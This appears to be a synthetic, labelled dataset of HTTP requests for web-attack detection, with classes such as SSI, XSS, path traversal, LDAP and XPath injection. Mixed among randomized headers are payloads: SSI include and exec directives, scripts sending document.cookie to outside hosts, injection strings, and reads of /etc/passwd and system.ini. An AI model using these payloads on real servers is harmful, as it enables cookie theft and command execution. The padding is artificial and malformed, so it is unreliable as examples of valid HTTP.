If-Range: Thu, 10 Jun 04 19:39:53 CET
Max-Forwards: 685
MIME-Version: 7.9
Pragma: sssaiLp4=ecs
Authorization: ashu aliHe=hEgi
Range: -885,-18051
Referer: http://www.4deh.de/hzW3tixt/ecwer8/irAr.sh
TE: gzip,chunked;q=0.7,trailers
Trailer: Host
User-Agent: 3drhtE4/3.2
UA-CPU: StrongARM
UA-Disp: 1330,7116,16
UA-Color: color8
Via: 8.9 www.c9irI4i.tiff
Transfer-Encoding: Tisca
Upgrade: tlia/1.2, occce8/9.6, vefrpm/0.5
Warning: 976 www.eguwaq.html "ahcm" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 517314
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42844
Start - Id: 40470
class: SSI
GET /4bOjepsolemd9nsO/b-t9/6SBYFiframeAH9-W/epwt/HviT9urssayxttehoab/ykQMWR_PiPSXbX/itfllxtfintoktofhroa/SZsO6QAZonAc-jf/3mrka7gaqo.gif?oatdaoddxer=07505&hht51ee2dyy6la=rBMG80sP&oKhQ0eA=y4IbR%40&8Ieri1DsnITecw=57913&ofOo3drg=1515062712&Esttno5t9e9=%3C%21--+++%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22--%3E&eR0io2E=r8adf&snm3rapoCs9n=+%3Cfwsn%7CyfTle&xKU_LvlYg7=hmfssexec+H%5C HTTP/1.0
Host: 54.128.36.201:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew, x-mac-arabic
Accept-Encoding: 
Accept-Language: ase-vokA, d2y2tnke-de
Cache-Control: no-store
Client-ip: 170.198.138.67
Cookie: 7poRla56si=88277634
Cookie2: $Version="386"
Date: Thu, 21 Aug 08 09:17:38 CET
ETag: W/"fAWBVr05qijQem_WNf"
Expect: gCixb
From: Yma7@5eefcOthto.biz
If-Modified-Since: Fri, 25 Nov 05 01:50:21 CET
If-Unmodified-Since: Mon, 29 Jan 07 13:32:05 UTC
If-Match: "c04HdilrvQsbnHtdD"
If-None-Match: "FnFD0yMoY5NnEuwc"
If-Range: *
Max-Forwards: 9
MIME-Version: 6.5
Pragma: sgerTp=ansolnO
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: Basic Nm55ejprYm9lc2w=
Range: 6740-758,0802-
Referer: http://hsr4.ch/sNo6fM/nevclos/oamri0eo/mtsSa5i/2md0h.doc
TE: gzip;q=0.1
Trailer: Date
User-Agent: Mozilla/1.1 (Machintosh; U; PPC 8.9; Yl-sc; rv:6.6.8) Gecko/51311560
UA-CPU: PowerPC
UA-Disp: 0480,927,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 025x185
Via: HTTP/6.0 www.rCsen.jpg, ceone/7.8 www.bsounii.png, 7.8 www.eaSn7e.css
Transfer-Encoding: AflaI
Upgrade: euiyir/6.1, hfa8er/9.8, bIRueh/1.1
Warning: 565 www.mo1i.jpg "difinztedvtd" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 98565372421828
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40470
Start - Id: 47723
class: XSS
GET /efn/Pit9kejesln7ogt.css?zozpdporiecielI=Vc&stledi=nxem2offobD%3Dfln%3A&yi8sgspSeOi=8879601&5isMkyanqls=felcvot4pm8tgh&ebeiJ4eA=yglrcjt1ale&Ijmrr=paoi0rcq&0qS.Lopeneb97=6CurPsEw&eetau=tprboot.ini6s&6pe=67823&nrsj=tnAi&eowame=1&_Ay9ftpkUc=64964&idtinn4rndyea=%3Cxml+++id%3D%22++++X%22+%3E%3Ca+++%3E%3Cb+%3E%26lt%3Bscript++++%3E%5Bwindow.open%28%27http%3A%2F%2F70.194.138.65%2Fnase.swf%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript+%3E%3B%3C%2Fb++++%3E%3C%2Fa++%3E%3C%2Fxml++++%3E HTTP/1.0
Host: www.fjMni.ch:0
Connection: ne0gsich
Accept: application/postscript;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 90.114.63.204
Cookie: BhEn=92309;etsenU=elinkhmeziiclrdropoM&k
Cookie2: $Version="7"
Date: Tue, 02 Mar 10 10:34:31 GMT
ETag: "3NoB8gEdJ4qpGAoUK"
Expect: 100-continue
From: aonie0x@uTdtewu.be
If-Modified-Since: Sat, 01 Nov 08 22:33:54 GMT
If-Unmodified-Since: Wed, 22 Feb 06 24:05:12 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic bW9hcmE6QWN5c2JlZXM=
Authorization: Digest username="Hstsdesd"
Range: 2174-,56-,-57382
Referer: http://www.acltgD.gov/riauhV/6uengp/mlioors/mohroicb/hiPr.nsf
TE: trailers
Trailer: Max-Forwards
User-Agent: 207ond (6RUyjVSRd; 0tlUBnPG)
UA-CPU: 68000
UA-Disp: 2301,334,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 0710x100
Via: FTP/1.6 70.92.247.158
Transfer-Encoding: compress
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 328 www.rri2Tey0.htm "ndrOro" "Wed, 18 Nov 09 04:33:59 UTC"
X-Forwarded-For: 210.225.244.166
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47723
Start - Id: 45572
class: PathTransversal
GET /bexeckandl0/P.zadmin4/a9m/xw/futhextee2ahSlre/i8K-fsstqWt/eEzK/huNfEylu9BzOecr.tiff?odtondsj=T%24uhform08eicrie%5DkctpsamP&lycddGhn=%5CWINNT%5Csystem.ini&bgsoundqtTiframe=U&tsSecir=9026335&spkllsn=4BIlandr&nenialt=4572748&6pg7eTl=68074861&AtQiWAaiK=rduaazlHEe+&ottxne7vg1obei6=nulla%7Ce+%27%29%2B&dNMcautoexec7=34 HTTP/1.1
Host: www.tyaeLrbufm.cz
Connection: aiseo
Accept: */*
Accept-Charset: x-mac-cyrillic, isiri-3342;q=0.5, ks_c_5601-1987;q=0.7, windows-1258
Accept-Encoding: compress, identity;q=0.7
Accept-Language: err93-sE00l8w, es8e-feha5s;q=0.2
Cache-Control: max-stale
Client-ip: 80.183.70.158
Cookie: 26ejuiimmAao=nRil'sp h%ud;AstdinallPwGinboot.iniEb=8Xip@exXl;qrpLOlhhee=taHY9YLf3t;anr6fp=08496;tiemrEBwoi=0826195030;t4elqo9=cef1nehnde8EU
Cookie2: $Version="99"
Date: Wed, 06 Jan 10 19:03:19 CET
ETag: "gTnNMGV--dVDb9PdH"
Expect: chatt5r=iate7c;ywiims=cuttsa
From: nnmuo@mspetgyxi.de
If-Modified-Since: Wed, 01 Dec 04 20:22:48 UTC
If-Unmodified-Since: Wed, 13 Oct 04 09:03:55 CET
If-Match: "X9aWOG2g7DkPiP2AKB_"
If-None-Match: *
If-Range: *
Max-Forwards: 54
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: b7an3 ismsIo=k0ei
Range: -2
Referer: /eldeE/jaiwih/ncae/aeijgwme.wav
TE: deflate,gzip;q=0.2,gzip;q=0.7
Trailer: Upgrade
User-Agent: aeduondtlxvxi
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 952x387
Via: FTP/7.3 www.n8a3r.shtml, 4.3 9.26.45.107, 6.6 www.7tyrrR.jpg
Transfer-Encoding: compress
Upgrade: ggC/2.3, d2sU/5.6, shIm/3.2, ehs/6.3
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 86157391207979195
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45572
Start - Id: 46774
class: XSS
PUT /iEfVnZY7xTij-/ryZAPz.J7V/lioTq/dcmdt/d4k02rz5OZlj-vhJw2/rdVzHZqL.jsp? HTTP/1.1
Content-Length: 375
Content-Language: hCo,tesuO
Content-Encoding: deflate
Content-Location: http://www.anqge8d.org/ro1o/eapsrk/rnqlzfej.jpeg
Content-MD5: ZWRleXhud2g3Z3doaXlFeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Nov 05 07:56:05 GMT
Last-Modified: Thu, 08 Mar 07 09:04:57 GMT
Host: 197.126.35.122:98903
Connection: e4fher
Accept: */*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: xtit-d;q=0.1, nwotprE-sac, aNent-a8thuoei, ohnicjts-sgE, tistt-esl
Cache-Control: 8hctu='iEteaO'
Client-ip: 19.200.37.172
Cookie: rcpdRfrom@=emwYfqPhg;jbrjocnEmt=j5he31zov;lhsusooo=3;podebt=coo;koeelomoecttald=6755854
Cookie2: $Version="208"
Date: Fri, 16 Jan 09 09:11:42 CET
ETag: W/"Ufr4QY4Us830CuN9T"
Expect: pnwtm=hnizs
From: dyenT@gpt6glsG.cz
If-Modified-Since: Tue, 06 Feb 07 12:57:26 CET
If-Unmodified-Since: Thu, 08 Dec 05 08:17:29 UTC
If-Match: *
If-None-Match: "RqRBm1hYPqE@7yJRe"
If-Range: "Il4PljWGfirCLPvpDwW"
Max-Forwards: 0525
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="9mhcA"
Authorization: ulhm lrnaont=tyEbeoT
Range: 462-
Referer: /y5d9a/urmeenio.txt
TE: deflate;q=0.3,gzip;q=0.9,trailers
User-Agent: Mozilla/1.4 (Windows; U; WinNT 9.5; wy-Tt; rv:7.7.3) Gecko/83560357
UA-Color: color32
UA-Pixels: 1199x1516
Via: 4.6 147.45.27.114:7
Transfer-Encoding: compress
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 124.216.57.225
X-Serial-Number: 670782401629
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

a4dY8trRaaav=aeeshutdowni+&eGngaXP=9olt0rteeycsn&ersza=652s&ptsahsdtnhg=p3eNMd80J&aee=694933173&enut75yGfdah=(+n&kS=349&acyibrye=<style  type =" text/javascript  "   >[alert   ('irTgm');]</style  >&seadge1t1R=sioj e&D5qQ=snrtjeeg8ipTon&kreh=nmhi@73ne7mbset&5shnt4aonr=aa6Ib&smrepivqt6jbnav=ptnehUcsbldR&o7ie=oeqweO&w7d5edhsmyLd8=eZGR7O

End - Id: 46774
Start - Id: 39847
class: SSI
POST /o3LQLgrkgS/rTdshJaeg/bGt0/@IMCHwinntU2YRER/ilzkdGZSaqE3NH/T9KSiQGd2Gkdeleteij-.dll? HTTP/1.1
Content-Length: 123
Content-Language: ogroded,Sjnifh
Content-Encoding: gzip
Content-Location: /rNJsclO/cHtaet6t/aeuo/dihrkd/Tf4ieos.wav
Content-Type: application/x-www-form-urlencoded
Host: www.dcywusb.ch
Connection: keep-alive
Accept: application/*, application/*
Accept-Encoding: compress, compress;q=0.3
Accept-Language: <!--     #include    virtual="/etc/httpd/httpd.conf"-->
Date: Fri, 24 Jun 05 07:14:42 CET
If-Modified-Since: Fri, 17 Apr 09 14:59:34 UTC
If-Match: "pddHs1gY0nLctpSWLO"
If-None-Match: "o2ETyjsqIvnNl7iYfM"
Max-Forwards: 3956
Authorization: NTLM N29lcllubDJuMWxvajluN3p0Y3NlYXRzamthN3JuS24w
Referer: /teoL.pl
User-Agent: h8pin2rul/6.8.2
UA-Disp: 955,7800,16
Transfer-Encoding: gzip

sgktt=eohttp &lNDY6=vrSoh7rr&30kna=bsn''n&osouninotp=yieoysexe2emc&aztoNheeyn=73480&jYwklbodyI-o=tl&http0kUdx-4s-BY=cf7

End - Id: 39847
Start - Id: 38216
class: LdapInjection
GET /qcmjVVYnull/5ofpreeo872eieh7/idttoqhe8oweidqle/xp4ehekjoldc4T4b/spcgne1ie/U1j/mz-gL.J2km/ozSs3l2m9/-Lmj.gZformi-.css?zhtdunywunaTvrm=460&hamdtAeLun=%3D&FLGF=te0+o&rym7tnwe=947246&tq=gol%29%28%26%28objectClass++%3D++TH*%29&CwbI4seurasj=Y8ls&1mnt=yesFors&JNcwS6PhW=6709&rt=90954108&whomeqpositionJBdJ=utgolrEhmoD9&edsokd6RitTey=5&upsthalo1=r3sle&oee4IEumn=objectgov+im%5CEa+ HTTP/1.0
Host: www.eetmihho.it:80
Connection: ld0ti
Accept: */*
Accept-Charset: x-mac-arabic, windows-874, x-mac-japanese, isiri-3342;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 9.211.101.123
Cookie: e98uhsscasq=2;stzdBEd=oHmdaBlie;I4J9K3MTD7wE=pQjK817o-jPE;7yrZbistPm=ne5;positionjvH_2mrcptelnet8vc=wRoUqcx
Cookie2: $Version="20"
Date: Fri, 30 Nov 07 08:26:44 UTC
ETag: W/"UStOSs522pUjsYdXz8Jw"
Expect: efooed
From: hnrpa@Dtsdlni.be
If-Modified-Since: Tue, 03 Nov 09 16:46:02 UTC
If-Unmodified-Since: Wed, 15 Jul 09 21:22:00 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 28 Feb 05 23:10:28 CET
Max-Forwards: 4667
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: 5eRiuu etshnsqi=eO4i
Authorization: NTLM ZWN5dHdvRGVyZ3djM3NvdGxpaW95aXNzZXJ0bmFvSGR5c21lZWNpZnNyZG9uZm5h
Range: 6990-,287-21192,-12716
Referer: http://www.irnn.com/ee3uneiz/r0tasaW/rkNd5nn/hPiegF.jpg
TE: trailers,trailers,deflate
Trailer: Warning
User-Agent: 4lZluujnTg/5.9
UA-CPU: 68000
UA-Disp: 912,7281,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 321x2267
Via: 2.3 63.96.136.165
Transfer-Encoding: compress
Upgrade: sdlwO/6.2, 4Awth/6.5, lsy/1.6, jri/4.6
Warning: 794 74.86.217.193 "6bkyotjee" "Mon, 16 Feb 09 06:30:50 GMT"
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38216
Start - Id: 49195
class: XPathInjection
GET /2ulrlrl62sH/nbvaqaeeil/mochaFc94/lnq/cQtinsertKIyWagZXzg/replaceW.9t-TV/et79eanCtoohpdfietys.mspx?PqSk_-v-_el=tgX&Ir5sp=ddichoutj1kpnfoe&asibbrzw6a4e=9657&tlDIailpbic9awm=eareplaceklebFcbiess&nsnbmeroeted7i=myrb1Ybn%27++++or++++1%3C+ebtkjE%2FstGp%2FasEX%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D25%5D+++++or+%27oFs4%27%3D+%27&isaeaoo7kllr=5528327&lcre=8Lnlooaeh&DbhCo2EAe3sh=s9ezDu&ofr=rwl HTTP/1.1
Host: 53.232.125.72
Connection: keep-alive
Accept: audio/x-wav, image/jpeg;q=0.5
Accept-Charset: iso-8859-2;q=0.6, x-mac-icelandic, euc-kr;q=0.2, iso-8859-3;q=0.8
Accept-Encoding: deflate, compress;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 181.41.86.41
Cookie: jw1sHSNchild=st;rdkde=iy;rwteh1aeuen=mror;JhtpassPD=nSelreemorcanrptSn
Cookie2: $Version="0"
Date: Sun, 07 Jun 09 06:02:25 GMT
ETag: "vrp1kGmnEHoBox1Rdwu"
Expect: wlenof
From: Gswzt6t2@seem.gov
If-Modified-Since: Fri, 30 Jan 09 24:50:27 GMT
If-Unmodified-Since: Mon, 22 Aug 05 06:35:00 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Nov 08 06:20:50 GMT
Max-Forwards: 859
MIME-Version: 9.1
Pragma: odoa=ho
Proxy-Authorization: NTLM c2FoaU9qc3RsdG9uY2VodDg3a2Z4U3NsYWJpaWVhNTZ0bmVzb2g=
Authorization: ettl fttto6=retPfots
Range: 87-,-69535,7135-70843
Referer: /rnum3ftn/nhzhro.asp
TE: chunked;q=0.7,trailers
Trailer: If-Match
User-Agent: obRs2/2.5.2.3
UA-CPU: MIPS
UA-Disp: 344,403,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 400x881
Via: eOokn/9.8 217.25.2.241, FTP/7.1 www.qnaotl.html, 0.2 177.164.212.217:65514
Transfer-Encoding: rnes
Upgrade: ntetn/0.0, b0d/6.5, tpec/7.7, 1est/1.8, aal/3.6
Warning: 143 221.24.90.70:6149 "atInyfjon" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 094897870
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49195
Start - Id: 47119
class: XSS
GET /ap.msf?MIj8xI=inn+++++%22++++++++style%3Dleft%3Aexpression%28alert%28%22+++eur.ni+%22%29%29++alt++++%3D++%22 HTTP/1.0
Host: 170.17.242.180:80
Connection: tDai
Accept: */*;q=0.9
Accept-Charset: windows-874, x-mac-greek;q=0.6, x-mac-hebrew;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 111.27.185.154
Cookie: CmRcUhtaccesTnYIB=t;3eSbRtsrReas=7XVqfk7
Cookie2: $Version="0"
Date: Fri, 14 Aug 09 22:47:41 UTC
ETag: W/"2w0lEfvBfkDGQbZ22V20"
Expect: 100-continue
From: dy0mird@eelb.it
If-Modified-Since: Fri, 08 Jan 10 17:46:25 GMT
If-Unmodified-Since: Wed, 29 Jul 09 02:09:10 UTC
If-Match: *
If-None-Match: "3ODNwJzxbdL9X5VQGn"
If-Range: "pkvVXtr2O-4U7WTH"
Max-Forwards: 476
MIME-Version: 5.8
Pragma: xheeg='sk'
Proxy-Authorization: Digest qop=auth
Authorization: NTLM cnNzZ2Vhc3RxbnNlN3JwVWZ2YTl3bm50dHNjY3BzZXJud2U1MHh0bQ==
Range: 38-13,-4
Referer: http://w7aadom8.com/tgd0ei.pl
TE: deflate
Trailer: Via
User-Agent: Mozilla/0.3 (X11; U; Open BSD i586 1.9; ue-ee; rv:5.9.7) Gecko/20752779
UA-CPU: 68000
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7372x166
Via: HTTP/3.3 www.ggoa.css, 7.8 www.c5erhzje.gif
Transfer-Encoding: compress
Upgrade: pen/9.1, ccf/6.5
Warning: 086 126.99.38.140:0 "cofaxltfcL1" "Mon, 16 Jan 06 15:09:10 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 2379709487507553302
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47119
Start - Id: 47824
class: XSS
GET /l9s/te.swf?2iE=746&deagm=rnmrks&rebS=85ettpihzN0&Hosfd3houbeer=081430396&ddueh=badmin&1g=%3Cbgsound+++++src+++%3D++++%22++++javascript%3A++%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.ch.com%2Fcgi-bin%2Flemanaic.cgi%27%2Bdocument.cookie%29%3B%5D+%22+%3E&goRSngot=t8u HTTP/1.1
Host: 181.240.55.255
Connection: keep-alive
Accept: image/gif;q=0.1, image/jpeg, audio/*;q=0.7
Accept-Charset: iso-8859-3;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 106.65.144.196
Cookie: lomknd37znw0=mz;ast6ienvf=35ir;ntn=edhw~[/;pfmtkiglaivyael=varTga;de3aewotn1qne=eedotusLan
Cookie2: $Version="3"
Date: Fri, 29 Jun 07 02:45:07 GMT
ETag: W/"OurwtpibD7A0noXC"
Expect: nets3L
From: esal@nqcagsropr.fr
If-Modified-Since: Mon, 20 Sep 04 19:28:13 UTC
If-Unmodified-Since: Thu, 10 Jul 08 01:12:20 GMT
If-Match: "Hhh@qIhf8nia.DsVqUWI"
If-None-Match: "HJvHbk2nRpGxH96nPX"
If-Range: *
Max-Forwards: 79
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: ae9de sesszy=lt9eEk7
Authorization: NTLM ZHJuYncyazBha2toZHRlbjljM09FY3BvRWN1b3N0a2g=
Range: 2820-37,-5180,81-
Referer: /hcaot.sh
TE: deflate,chunked,trailers
Trailer: TE
User-Agent: eOLGul http://www.destan9N.biz
UA-CPU: MIPS
UA-Disp: 162,931,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 907x206
Via: n7a61b/2.6 36.163.107.205, FTP/7.8 145.225.174.171
Transfer-Encoding: gzip
Upgrade: tt5hfe/7.3
Warning: 325 81.170.42.32 "7FeeyLne7hiEmT" "Mon, 30 Nov 09 23:36:47 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 4290166735414174
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47824
Start - Id: 48856
class: XPathInjection
GET /yvPq/df1rluzxghesbfivc/tPghkt/vy/RJ@sS2zsq-Zboot.ini.php?oPKjY=%3Cromihdrops1eiNmisystem5c+nph-&noion=ihir%27++++or++++6+%3C+++++count%28path%2Fchild%3A%3A*%29+or++++%27eitue%27++%3D++%27&tcnmes=nonathopgeat&smFih9Wa8hq=2340&oDyttge=tkIt&f6R.=3&nuaiahas=63%3F&mcnn9thoh=e++ot&tnpldIrRaeooqS=22516352&wa=tbx&HDexecCDsinBR7=110723&wcxO7zdhn=qcstE8htaoam&eryhbtta2neR=60&kAwEaseae3ejn=Ep HTTP/1.1
Host: www.gsoS1h0k9s.fr:6
Connection: close
Accept: */*
Accept-Charset: iso-8859-3;q=0.2, macintosh, euc-cn, windows-1250
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 136.172.120.185
Cookie: 0mRsevgdttraAg=yBgC5vz;OucaEn9xMtshutdownn=47;Zi5xHF=2;he2=1;betdCH=nrsSVF1.
Cookie2: $Version="658"
Date: Sat, 24 Apr 10 22:15:44 UTC
ETag: W/".D0ehbAU9Y6-@zosB"
Expect: akafu79
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Wed, 10 Nov 04 17:17:37 UTC
If-Unmodified-Since: Fri, 28 May 04 09:28:46 GMT
If-Match: *
If-None-Match: *
If-Range: "plbjSI0fFmSsUThrLBLl"
Max-Forwards: 44
MIME-Version: 4.5
Pragma: m7n='t'
Proxy-Authorization: NTLM a05vZXJvNWU1aHRyaGFzM21hblBscHNuZWliMmh0RXRp
Authorization: Digest realm
Range: 845-,90670-12915,351536-
Referer: /gs3sw/ltb5sJr/mztwt/sksi/zxbv2E.wmn
TE: gzip;q=0.5,trailers
Trailer: Accept-Charset
User-Agent: esn6egrehE2sth1
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 842x5954
Via: FTP/8.8 76.96.175.141, HTTP/9.8 116.199.59.145, npiy/4.0 www.orlgdhi.js
Transfer-Encoding: identity
Upgrade: wrmk/0.8, tyuf/8.4, rih/4.1
Warning: 031 102.38.172.102 "nisa2e2yv" 
X-Forwarded-For: 186.251.4.115
X-Serial-Number: 177199337529573688
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48856
Start - Id: 40100
class: SSI
GET /oaaU.mspx?EKdRgXV.G=60&itioue=hltnye2glotuSe&obMJqdyseimal=33958256&mEthtetnRnctfom=ht7laoEyoi+%3CI%3Dr&aezi=iaA&sde7anfbsrin=io1aU9zaetdtshesa&lctn5ipz=%3C%21++%23%3C%21--%23exec+++++cmd%3D%22id%22--%3E&cZdformep-stdin=926284&dulw8oir4hpLh7=uM%3AshaglsnAyp%24n HTTP/1.0
Host: www.tlgsgtvx.de:80
Connection: close
Accept: text/*, application/*;q=0.2, text/plain
Accept-Charset: utf-7, windows-1258;q=0.4
Accept-Encoding: 
Accept-Language: ue-Ea0ao, u-nnR, ndiaot-psitont;q=0.0
Cache-Control: aj='enh'
Client-ip: 192.227.59.26
Cookie: Omir=22698
Cookie2: $Version="5"
Date: Thu, 22 Jan 09 06:30:39 CET
ETag: "TiA@-@BOj-dF88jDdY-F"
Expect: smk9rHu
From: wapns@pecdn.de
If-Modified-Since: Tue, 27 Oct 09 16:00:20 GMT
If-Unmodified-Since: Fri, 23 May 08 22:59:36 GMT
If-Match: "jV3Pi_I1WMaCmpTp@FT"
If-None-Match: *
If-Range: "YSlp-R3rBSXZ2bPVpIM"
Max-Forwards: 6
MIME-Version: 0.3
Pragma: suerdo9Q=e
Proxy-Authorization: Digest uri=http://hOaez.ch/vyle/adcoet/ecied4i/lmeje/fyuT.htm
Authorization: Basic czBMcnNhOmhwdEI=
Range: 0-640
Referer: http://5ec5g.org/neEfem/5twA/oiiA/a4ehe3il/591as.mdb
TE: deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.9 (Windows; U; Windows NT 2.6; te-rf; rv:1.4.2) Gecko/35492300
UA-CPU: 68000
UA-Disp: 952,4343,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 192x9251
Via: 0.9 www.f6hxcoq.htm, FTP/3.4 www.darlA.html, raew/7.3 237.46.108.182
Transfer-Encoding: compress
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 579 74.104.76.46 "raice5uopltesn" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 606454137105
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40100
Start - Id: 46444
class: PathTransversal
POST /9my-8O9C02OnteAlGHhd/MKPSnt9tmpY/dJ9mvtTwxSEt@W_Gh5QN/R89A-ku8O@LiJM/4RQXRHmC__-O/r0ccfQ/D4includejID39or2betweendIk.jpg? HTTP/1.1
Content-Length: 60
Content-Language: na,jyiloTs,an
Content-Encoding: gzip
Content-Location: /Lmd6ht.swf
Content-MD5: SHdpc2gycnR5YWhhY2ZkYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 Feb 04 21:10:40 GMT
Last-Modified: Thu, 25 May 06 03:22:26 GMT
Host: www.sOidaaleHi.com
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: /etc/passwd
Accept-Language: o6at5it-teo52o, d-apar
Cache-Control: max-age=86417
Client-ip: 205.90.200.24
Cookie: feJ_Y@=63;R4mEf=bda;body1p0shutdown5s=rmn 3pw;FuVNUajc=rQAL3ERw_
Cookie2: $Version="257"
Date: Sat, 16 Oct 04 01:23:17 UTC
ETag: W/"oh2OdPAWzy1yT7j"
Expect: 100-continue
From: oaSi@2eps.gov
If-Modified-Since: Wed, 07 Oct 09 20:47:29 UTC
If-Unmodified-Since: Thu, 20 Apr 06 04:35:14 UTC
If-Match: *
If-None-Match: "y@zKP51XC7f3F9cr"
If-Range: Thu, 29 Dec 05 02:43:59 UTC
Max-Forwards: 8
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic VHR0dzpvYmxvbHk=
Authorization: NTLM bHZvaWV5cG10dHRqdDVZcnN0aGVTeXVtYWhydWhvZW83Uk9ubmd4dGhS
Referer: /3owobrn/ob7fa/rihnc.pdf
TE: gzip;q=0.5,trailers
Trailer: Accept-Encoding
User-Agent: wiehpfserc (suCk_aw; rkJEe1; divEjh)
UA-CPU: MIPS
UA-Color: color32
Via: 1.7 222.252.132.175, 2.9 www.deuiooi.jpg, 1.8 118.58.243.135:413
Transfer-Encoding: t2po8e
Upgrade: Dn8t/0.9, th1/0.8
Warning: 606 www.oesMh.js "tiei9eE" 
X-Forwarded-For: 71.14.248.191
----: ---------------

rw=wom&nnhinudroz=sa&gumil=zga&JTrQRMs=do=5a&riwoTm=rd9oab

End - Id: 46444
Start - Id: 39478
class: SSI
POST /ahhi5fAleoet4stonlir/tlqK6l6lM5vEU.v4.g2/lb-k/nie6eaehtAheo/so3ry3@d@h/shltea38mnOkLeep.shtml? HTTP/1.1
Content-Length: 203
Content-Language: azDe,xes
Content-Encoding: identity
Content-Location: http://tuln.org/lpnh.php4
Content-MD5: YmRlTGFvdGxsdWRsbHRxeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 04 Nov 06 06:15:52 CET
Last-Modified: Tue, 08 Sep 09 18:28:05 CET
Host: www.Nahle4ee.net
Connection: close
Accept: */*;q=0.9
Accept-Charset: macintosh, euc-tw
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Cookie: achMiea=835406;5E9aay6Oee=lxFlDy0t;IAcopyeBnpslHG=q|a;hv=h\'tlmonhsr Evbscripts heme;ttrnnoe=Tag
Date: Mon, 21 Mar 05 07:43:31 GMT
If-Modified-Since: Thu, 07 Apr 05 01:51:23 CET
If-Unmodified-Since: Tue, 19 Feb 08 17:41:44 GMT
If-Match: *
If-None-Match: *
If-Range: "Cp2FSMInS-qTbRa-XDx"
Max-Forwards: 91
MIME-Version: 4.6
Pragma: no-cache
Authorization: djgtp9 tnsle=ihemn2iu
Referer: http://www.hoxtw0.uk/eROacdc6/sizsf/omlyl.exe
TE: trailers,gzip;q=0.7
